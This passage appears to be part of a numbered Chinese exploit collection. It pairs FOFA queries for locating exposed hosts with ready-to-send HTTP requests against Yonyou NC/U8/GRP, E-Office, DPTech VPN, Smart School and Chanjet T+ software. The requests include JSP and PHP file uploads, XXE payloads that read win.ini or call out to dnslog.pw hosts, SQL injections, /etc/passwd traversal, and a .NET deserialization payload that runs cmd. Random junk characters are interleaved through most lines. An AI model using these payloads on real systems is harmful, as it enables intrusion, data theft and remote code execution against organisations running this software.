x3 g" S4 a" C1 z- w& Z( {POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
4 E$ E7 M9 M" ?) a/ QHost: 203.25.218.166:8888
* C" k( T. G# d9 _1 T6 k8 f9 PUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info- [5 Q0 E# H! V( b
Accept-Encoding: gzip, deflate; P C( r! u8 d9 Q
Accept: */*
+ p; w7 D: x" R/ g% Z" k: LConnection: close
3 i! j, `9 Y9 X D6 g3 m0 N4 T6 kaccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
6 S# b4 U( R" J1 t2 _Content-Length: 190" f7 p# O0 v) ^
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
9 F* Q0 m7 H/ x) M7 }2 H9 ]& P& o4 U" A$ @; H2 m
--fd28cb44e829ed1c197ec3bc71748df0/ H! o, J1 |9 u" c
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"$ E) @, t5 P) C
3 r( d& ?1 ]5 d; J7 F6 M" D/ P) W
<%out.println(1111*1111);%>4 b/ A% _- @8 p% J3 ^4 W
--fd28cb44e829ed1c197ec3bc71748df0--
# z3 }5 {) \. J3 w- r3 d
" o- p9 \+ j: u6 F$ A: j7 o
0 Y6 m: ]! y& i; J: \" T36. 用友NC-Cloud soapFormat XXE
! d8 T3 V' O( _+ k/ q1 R [6 m' VFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
" u& e) b5 a9 t' PPOST /uapws/soapFormat.ajax HTTP/1.1
& A' y& i; l* e' o1 jHost: 192.168.40.130:8989
$ X# z- a/ c) d% G% R) P! [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0# E7 _: Q- G6 ^) ?% D
Content-Length: 263
j+ x; X, x; i; b7 ~0 zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ v8 X/ b' S) z5 qAccept-Encoding: gzip, deflate- B5 h$ o3 P/ E1 {8 Z/ {+ y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 W. W5 v) M/ F. ]- y4 _( O
Connection: close
4 i- K% ~) ^: r# L5 N: ^7 pContent-Type: application/x-www-form-urlencoded) M8 Q5 P `& A j
Upgrade-Insecure-Requests: 1
" s. R" T# j6 g2 g! \ e v# v
3 B) `6 ~- b5 ?( t0 Qmsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
/ i( h; w& M3 U% i! W0 F$ U
( t) u% J: g9 d6 t7 R$ E
/ j' O; e8 U3 T" K1 E37. 用友NC-Cloud IUpdateService XXE
; U# R3 }, h% u) bFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
' Y* I# k, |/ p3 W$ Q7 }* WPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
) O0 h* \: k; K+ BHost: 192.168.40.130:8989
3 h" s$ N9 f5 N4 R$ ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
+ t0 N- F8 i* [9 z% ~Content-Length: 421
7 ]/ f$ g2 V E3 y% w5 a/ wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
7 f* r* @/ Q; G; ]: \& CAccept-Encoding: gzip, deflate3 s0 ?9 U; E! E& U% K* l
Accept-Language: zh-CN,zh;q=0.9
) x1 @3 Z4 ]% l6 OConnection: close
3 c( w( T0 ]1 @Content-Type: text/xml;charset=UTF-8. v' a$ T: r4 u
SOAPAction: urn:getResult
; F2 O8 I2 g. JUpgrade-Insecure-Requests: 16 N F6 ~; j; d* m6 N, o2 e
, s1 M) P& Y6 p7 n<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">1 N. ]- \) _! c- ]; L6 k
<soapenv:Header/>! `2 F5 [# X( Q1 X; `- j$ [
<soapenv:Body>- n+ i2 y3 |) S9 W" ^" Y8 s
<iup:getResult>$ s* d+ N, F# e8 [6 w8 q( D
<!--type: string--> f1 ~( ]" I& [% f! {
<iup:string><![CDATA[" G2 m( w! A+ o/ u* g9 d2 c5 P
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>0 o: m* Z& u5 d& W2 x% {
<xxx/>]]></iup:string>
8 h. X+ b: x9 ]0 L% v# u8 \</iup:getResult>
^" m$ r0 }1 K8 _4 f$ z/ B" d</soapenv:Body>
! h, b' P/ I4 l- o& a</soapenv:Envelope>
9 ]+ F4 I. L I9 d6 O& }0 w9 m0 ^2 U; K7 \8 N+ ?2 j
2 _) j$ P! f4 |. X S1 ?& n, s9 o" i
2 W; R# P B, k6 Q38. 用友U8 Cloud smartweb2.RPC.d XXE
! c- ?5 W9 P6 @; |9 LFOFA:app="用友-U8-Cloud"
5 s5 [& t/ F3 ` PPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1 w5 s0 r1 S! i5 T2 T# Q
Host: 192.168.40.131:8088/ K6 f' w4 w4 L6 p
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
5 x/ ~4 q4 a/ B" h9 x) yContent-Length: 260
o1 q5 h8 D8 c% D( I+ i0 a8 r8 UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
' p5 {* N9 z1 T5 u; PAccept-Encoding: gzip, deflate
1 F. n3 A0 i( E; F( J: yAccept-Language: zh-CN,zh;q=0.9
3 Q, \/ }3 o' x/ s5 y; sConnection: close2 T# Y6 L0 Q7 T5 t9 t) _! }$ M
Content-Type: application/x-www-form-urlencoded
9 W3 p% L z( V# v
' x- e. _4 l) g3 y0 q; C__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>: K; v& s# _) \) s) V4 A
! F9 ^. y" g& n6 O) r/ R, Q$ j
5 G) J7 C5 N& Y+ Q" S8 }
39. 用友U8 Cloud RegisterServlet SQL注入
; x9 f! C f7 o" ^7 M7 [7 }FOFA:title="u8c"
8 a) N9 \5 L! K+ m* N- dPOST /servlet/RegisterServlet HTTP/1.1
* Q# K- s5 ?6 ?, E* s tHost: 192.168.86.128:8089
% @+ G7 r4 ^9 A) i- h* c3 CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
5 s/ D* y6 V+ \$ M3 L: TConnection: close4 ]: y$ j" O8 ?8 [
Content-Length: 85
: ?7 ~5 v' @1 gAccept: */*
T, \5 d( `' m7 iAccept-Language: en* v/ F0 \* @8 t; ~4 A
Content-Type: application/x-www-form-urlencoded9 S8 ~' [9 T2 s8 W3 `7 ~" ^. Q" }9 v
X-Forwarded-For: 127.0.0.1
3 A8 h5 y0 Q3 r& z! C; G+ t' HAccept-Encoding: gzip6 e; Y! u. _0 o! e4 O7 j9 L" ]
# r& Y! ~( n( t9 ?4 X) Z ?. \+ Qusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
9 q4 ~( f! x7 @0 ^& r
, n, Y* @# E/ H; u' ]8 q
* A" f# b4 z5 W& b- R& E40. 用友U8-Cloud XChangeServlet XXE9 K1 N7 ^& W1 d; z0 u
FOFA:app="用友-U8-Cloud"
e; d2 A! O- nPOST /service/XChangeServlet HTTP/1.1
2 Q$ J5 L/ |0 b. Q: gHost: x.x.x.x d, }0 C3 @& f' Y) q2 N+ _; N- ~
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
* N* t3 v1 \. C9 u) rContent-Type: text/xml* i" g) z9 r% A$ V5 N
Connection: close! V' a0 H, M: a* E3 M% D% l
# `# |, [1 a& Q" {<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
6 ]/ |/ c" r) l' {. u) y$ [
# ]0 l# @: u! z' [+ H1 @6 W/ Z. M; c# B7 a6 y+ \% V
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入+ N) c: d% V# {" I9 F- V
FOFA:app="用友-U8-Cloud"
7 c! e" R _& |2 HGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1& G4 _8 \0 I5 Q& o6 p+ ?% \
Host:) c3 C8 U8 n/ @; U& S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 b( r; Y, g2 L4 |) I0 aContent-Type: application/json8 t9 o: S7 b+ p
Accept-Encoding: gzip
( c: @3 B$ t$ v! Y; ~0 CConnection: close3 @1 L0 @* ~, l/ P% \
- O2 r3 @/ ^$ }& F" K7 l/ {) |: j; H i& R9 w# \' u! y9 b9 V
42. 用友GRP-U8 SmartUpload01 文件上传4 W+ ?- o' y2 U" K1 d5 o+ ?
FOFA:app="用友-GRP-U8"4 `. I$ ~+ U c
POST /u8qx/SmartUpload01.jsp HTTP/1.1
1 V( x A+ N: C, V: I" U9 bHost: x.x.x.x, q5 j" F8 m5 P) }, W
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
?/ K9 y8 l% a+ uUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36; M0 }0 E" p& [( v
& i; U9 E6 h8 V( J8 D: [1 X& P
PAYLOAD r: E6 a1 O9 Z
6 {6 h) b) N0 Y ]8 |! B3 |1 g
@( V2 S+ [8 Q0 G) x" k/ lhttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml( @# T2 x- _5 T
) x* f9 ?5 p2 G! V- @7 b7 V! ^- W43. 用友GRP-U8 userInfoWeb SQL注入致RCE
% d# o7 k9 E/ n1 B& y' iFOFA:app="用友-GRP-U8"# p: R3 M: k6 k, z: X. @9 P
POST /services/userInfoWeb HTTP/1.1
. g: q$ F( V+ d5 r9 Y; `Host: your-ip9 p$ z0 {9 r: W( v: K, J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
# n+ H! V: q; b* Z) Y/ m* ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ C: J$ P+ |! d5 r, b
Accept-Encoding: gzip, deflate& M5 B3 p, S: u8 |1 b$ K5 ~, n
Accept-Language: zh-CN,zh;q=0.9
! E3 f* \5 Z+ x+ ~- p# \1 D( MConnection: close3 j* z" V. k' n+ e+ T+ ?+ c, G
SOAPAction:7 |) ]" f' d8 h" h# a3 V5 w( ]8 _
Content-Type: text/xml;charset=UTF-8- j: s: c( e) t: R( h/ l; h6 @+ H# U7 }
" A1 Q/ v* u2 _, r$ l6 E<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
; C7 u' N. W! ]) q <soapenv:Header/>
1 l- ~$ c* Q% X, |" C6 \1 w <soapenv:Body>" ^4 u1 x9 T. j5 [3 y5 a. J
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">$ i4 A7 P- ~" [5 l! K- n
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
' s# K! D" \7 o </ser:getUserNameById>
) G% Z. F1 b+ y" m7 e0 K </soapenv:Body>
9 W$ w8 p' g4 R) n7 E$ `. Z8 B' r</soapenv:Envelope>
5 e' a' Q$ Z- F/ H0 @; M$ O5 J G( p4 ?4 h* J: m
0 n2 i8 k3 K [5 y9 g
44. 用友GRP-U8 bx_dj_check.jsp SQL注入+ F5 Q2 P% [+ `' K0 j$ A
FOFA:app="用友-GRP-U8"
. C8 _7 h* N( {: |, MGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
) T2 L- R- @6 ZHost: your-ip
/ r1 s" {$ v( a* yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.362 c& Y8 W% N+ D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! Q: Y/ V. I# D; H, `6 V1 BAccept-Encoding: gzip, deflate
* t4 e( Q' l) F/ u+ h/ eAccept-Language: zh-CN,zh;q=0.9
( @0 z, Z! o! EConnection: close/ f1 p; L: S2 P( h% O; Y# s
: L! Y& A$ D3 @3 H- \
2 u6 T9 J3 y3 |0 p
45. 用友GRP-U8 ufgovbank XXE
+ f7 S" N5 c5 i4 o3 M: y" W9 VFOFA:app="用友-GRP-U8"8 k/ V. m( d1 e+ y! y
POST /ufgovbank HTTP/1.1
. `' _) R, C/ { p# K3 w* tHost: 192.168.40.130:222 j( H- Q }9 C, i! k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
0 E7 V% H8 K% i& BConnection: close: a5 m% X. Z( n, Q* L
Content-Length: 161
/ Y9 T$ q5 J9 G B( XAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, O- I& b. c& Z; b
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( l+ }& C0 ~8 ]( Q
Content-Type: application/x-www-form-urlencoded
" q6 r% R: A$ Y3 ?' r! W1 s- ?Accept-Encoding: gzip/ Q. U9 {7 a+ O4 w
% E R$ c8 X9 r2 d0 oreqData=<?xml version="1.0"?>
/ f* Y: l0 x- l6 E8 X. J1 X<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
- d% G. ~, ?( j3 Z
( ` p/ G& I$ V6 m: T/ _+ m- j5 Y# p
4 m5 ~& b7 J& ~3 a46. 用友GRP-U8 sqcxIndex.jsp SQL注入
4 ], o/ }, D3 X0 o) zFOFA:app="用友-GRP-U8". @2 y/ ]7 a2 T4 Q& Y4 L9 M
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1* j* b m$ }& Q/ f* P7 }% L
Host: your-ip
2 T& r+ ?8 h# ^4 [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.364 X6 }& A, n$ D1 y( c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 X5 c! E" X; m1 a7 AAccept-Encoding: gzip, deflate- D: H9 T; K$ R2 ]! @
Accept-Language: zh-CN,zh;q=0.9
3 C( @9 n! L% ?. d0 jConnection: close
- ?( h4 o& S. t2 ~8 i0 z. S5 e2 X' v* J6 F
; j2 }3 v0 R- M* |. `+ i- b# n A47. 用友GRP A++Cloud 政府财务云 任意文件读取
6 s* `/ m4 y! h1 m3 X. {FOFA:body="/pf/portal/login/css/fonts/style.css"3 @+ v/ @6 J8 k% i
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
7 M; m$ F; @; Y ]Host: x.x.x.x
7 X- d) m" U8 @1 O% I u2 K' M8 gCache-Control: max-age=07 H8 o/ z I* O( T8 W8 M( |
Upgrade-Insecure-Requests: 1" J4 ^' K' d9 j# Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
9 D) n( P1 F' ~; l2 v1 c, ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
V m& }4 s% K @$ U uAccept-Encoding: gzip, deflate, br& t, ]: I, W) b) C1 L3 D8 z
Accept-Language: zh-CN,zh;q=0.9
% n1 K" B: B DIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT+ V# `' g5 W- b+ q: o8 ^
Connection: close" q4 H+ k; a. J$ q3 Z9 e
* _ \1 O& c1 k3 C) T) g; o+ ]6 t& {$ h3 j
6 W! `. F' h; p0 x; @ {$ ?48. 用友U8 CRM swfupload 任意文件上传# k* A" G: P* h* D/ {
FOFA:title="用友U8CRM"8 P* O: i# g& e' g/ i ]
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1' M* L: \, ]0 z# M- @
Host: your-ip3 W( M1 C) u# K' o/ N. V- N6 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
6 Q0 d, I* b3 ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( s4 Q% ?( n. A. F
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 f" U. q6 s. f7 i5 r
Accept-Encoding: gzip, deflate
/ q# R; v$ u5 [: I- m! s' G3 vContent-Type: multipart/form-data;boundary=----269520967239406871642430066855
# ~3 e7 {' _0 w# O8 G------269520967239406871642430066855
0 R* o3 Q7 X4 T2 t+ HContent-Disposition: form-data; name="file"; filename="s.php"
+ e4 s1 |( p, A- `" a2 r/ ?1231
. B( r" ~' Y. @8 [& ZContent-Type: application/octet-stream
$ n% j0 ~$ e2 b6 M- x, w------269520967239406871642430066855
7 ^& y" n: R7 e. T P7 wContent-Disposition: form-data; name="upload"# X9 h5 @% Q3 f& w
upload$ v7 X. {* K- r: a! c/ s
------269520967239406871642430066855--1 V$ G/ s7 Z" |3 q: f0 F9 [
* Z8 Z( }; d; G' I9 W# v
; G# q) z3 F( Q
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
! S6 r O- G4 ZFOFA:body="用友U8CRM": e9 E9 T* T3 ~0 Z, C6 t/ |5 n
( e0 n6 g C' V" n
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1. ~( `& g* t+ ?3 u3 P# X! |- W
Host: x.x.x.x$ ^% ~3 X$ [8 w3 J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
) V1 H: ^3 _, a: SContent-Length: 329: l; e* W. S5 b3 |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
; U( I9 i/ w* X! t/ J( ZAccept-Encoding: gzip, deflate
# T, H# v" u5 r, `Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 \' O% o. R4 r; J) l3 n" @
Connection: close% a/ Q2 N) f8 p% @
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w- ~ S( { [: F) D
! J+ E, y# I1 a3 T5 b* N- d4 C
-----------------------------vvv3wdayqv3yppdxvn3w
: M! \9 I4 z! T0 O$ O) p3 yContent-Disposition: form-data; name="file"; filename="%s.php "' N1 X% r; E5 Z5 J" T
Content-Type: application/octet-stream1 B" D7 e. ^) ~/ G* U
5 \- B4 W6 \; g) n9 A
wersqqmlumloqa- I% `9 L, Z& @& U: F
-----------------------------vvv3wdayqv3yppdxvn3w' i+ N( O; X3 I' q6 @
Content-Disposition: form-data; name="upload"
8 @ N9 W1 E0 S) a
1 e+ l J: n. n7 dupload' \( b* G6 J# p
-----------------------------vvv3wdayqv3yppdxvn3w--! k8 V' B$ \+ X) I1 C \0 w% @
; n5 k# r1 H7 d
+ `8 [7 @9 i9 L1 y$ u) t4 V$ C# fhttp://x.x.x.x/tmpfile/updB3CB.tmp.php$ ~) j1 I. {0 {+ K
4 k' B, A9 \9 S9 ~( @50. QDocs Smart School 6.4.1 filterRecords SQL注入
" b$ }' f5 ^' H2 S- J2 {; }FOFA:body="close closebtnmodal"
# T* I1 N% i) Q8 X8 y- m" dPOST /course/filterRecords/ HTTP/1.14 @& y! V. \8 c& c3 o8 l
Host: x.x.x.x' v) |2 W2 b' T2 b' I/ A$ R. `% Y. m
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36; x/ a6 s' u q/ k
Connection: close# l7 q& l* F9 I
Content-Length: 224. `& L$ c" s. p8 Q/ Q$ }
Accept: */*
. i" @& f; O& |' X) Y9 wAccept-Language: en/ E* }$ @7 ?- x- P2 j% A( W
Content-Type: application/x-www-form-urlencoded
' z2 z' L" J2 |& `Accept-Encoding: gzip2 J6 ^* f8 B8 W- X
% a7 B' Z' v% M+ V1 k7 v# a- ]4 D+ bsearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
& {2 u, r4 U) Y
8 y) h3 }5 ?6 h6 v M, Z1 B+ W- k- N% L; |' \# G. z
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
! Z4 K5 \+ {: @/ A+ u5 F2 j+ [' Y8 VFOFA:app="云时空社会化商业ERP系统"
3 U/ c7 d* ]& r9 O" h7 PGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
% U o8 w: t: h v3 cHost: your-ip
' H- Q+ m" L0 [7 XUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
0 V/ U$ K1 R1 }( e4 y; C( XAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
" ^% S1 S; i; S( ?8 \" \3 pAccept-Encoding: gzip, deflate2 E3 n. v1 E) A5 D4 T2 J0 b. r
Accept-Language: zh-CN,zh;q=0.9% Q# S- `2 D% R5 C* l$ h6 v( l- u
Connection: close, C2 n& M) R* ?7 V5 m" |
8 _, w' ?6 s& u0 S2 q
! z/ ?3 Z- A$ `! x8 [52. 泛微E-Office json_common.php sql注入9 X) j5 e% a }7 F6 P( G
FOFA:app="泛微-EOffice", Q w: U# r1 }$ l
POST /building/json_common.php HTTP/1.1* a) e8 N, s# A( p1 ^/ ~: b2 ~
Host: 192.168.86.128:8097
. x! ~; b- Q) R# }8 G+ `! OUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.367 r1 T2 d) y3 d# k
Connection: close; i$ t* w8 }; }" L. d+ V
Content-Length: 874 w9 K) I0 B! w) n
Accept: */*( |3 }0 x) G+ D- S6 \+ M
Accept-Language: en- k9 A) n" l2 D6 p
Content-Type: application/x-www-form-urlencoded4 v1 L. q: {6 G+ }' C
Accept-Encoding: gzip
5 f/ R& o8 o c
- \% |9 E( Y2 r U* {6 q9 [tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
/ [! e/ m( [* |1 L0 \0 C' j! s/ f" [1 H2 e
( n% i/ C% M- l) ^ g2 ~4 s' l7 q# L! z3 _1 ?# j! z# Z
53. 迪普 DPTech VPN Service 任意文件上传
# @* R3 `8 I- p6 s( SFOFA:app="DPtech-SSLVPN"" x7 ^# d- r" ^
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd4 g0 s+ L6 c1 ~: s- t
% p% a/ \( w8 `/ |/ ^1 \# y3 g, ]+ V+ d6 O- W4 B
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
/ W7 F, y+ |/ ~FOFA:app="畅捷通-TPlus"+ \ h4 q: Z* G# H6 B+ o
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件* m" V( R7 f+ W5 E0 f0 f
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"8 {: \5 u* x, D+ v7 x. A/ M+ ~
7 o. ~3 J: m' j6 }" P
, ~1 J9 v- ?. a& l9 J6 E" j完整数据包
- P0 r3 z9 s! F' i1 G, T: jPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1! q! q& i: k7 W$ v5 i
Host: x.x.x.x
+ I9 L% ^2 D/ q2 O/ A5 |User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F4 K2 q# H2 d% v# C/ o
Content-Length: 5935 S _$ k, W+ N5 c9 j& e |
6 k; g) f' \% q3 Z
{
$ }( L8 i# z* q S/ a9 c"storeID":{; P" d3 U6 f8 o! U3 n* \
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",; {; N) [9 G+ F6 u! M+ i2 T5 E/ N
"MethodName":"Start",' ?4 a& T( | c. ]2 Z3 r& c
"ObjectInstance":{, L" [1 c& y& z5 Y0 ?. Z
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
+ \5 n9 y+ s0 f0 {5 ?& Q "StartInfo":{
8 @! H) H# w0 O! {! e0 a& M% T "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
! g g. L, j6 h/ j7 A "FileName":"cmd",
/ i- ~3 z% |3 ^- d4 v) B( a "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
' {1 W& X* S! }/ w3 W* v }
, K+ g/ B( b0 n! n9 l# B- R }& L2 j7 M; F" r( \$ [& r& r, }
}8 \! B# u* P5 F+ u2 ?' l
}( l. m$ |1 Z, O" w3 n1 l& `
3 ?/ X7 t% k4 F- t$ m. W- o8 w) |& a2 V! @/ d2 C$ O& ~' T
第二步,访问如下url
- U, O9 ^7 a( `! F/ m/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt0 o% u1 J2 L1 P6 s- F* ^' P8 `
6 \2 R5 ?1 W k' s( _% Y) _+ U( u6 M
9 o/ p0 M7 B6 X% ] S% D# D55. 畅捷通T+ getdecallusers信息泄露
+ {$ D0 t' }3 D7 \! }FOFA:app="畅捷通-TPlus"
- Z1 @. \9 k w" o p第一步,通过
# K1 q& y' i( |7 v- H/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
+ c2 n/ F x% k" ~ X1 O1 n第二步,利用获取到的Cookie请求! ]- |& W& n0 m" k4 U9 i0 H5 h
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers. g, \9 `- X! [
, |1 G& E$ w' O5 e: Q56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE/ J; k- ?2 x; A% c
FOFA: app="畅捷通-TPlus"+ g! j$ S# e$ U6 @9 i
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1& Z6 e# l5 ^% G! D. F
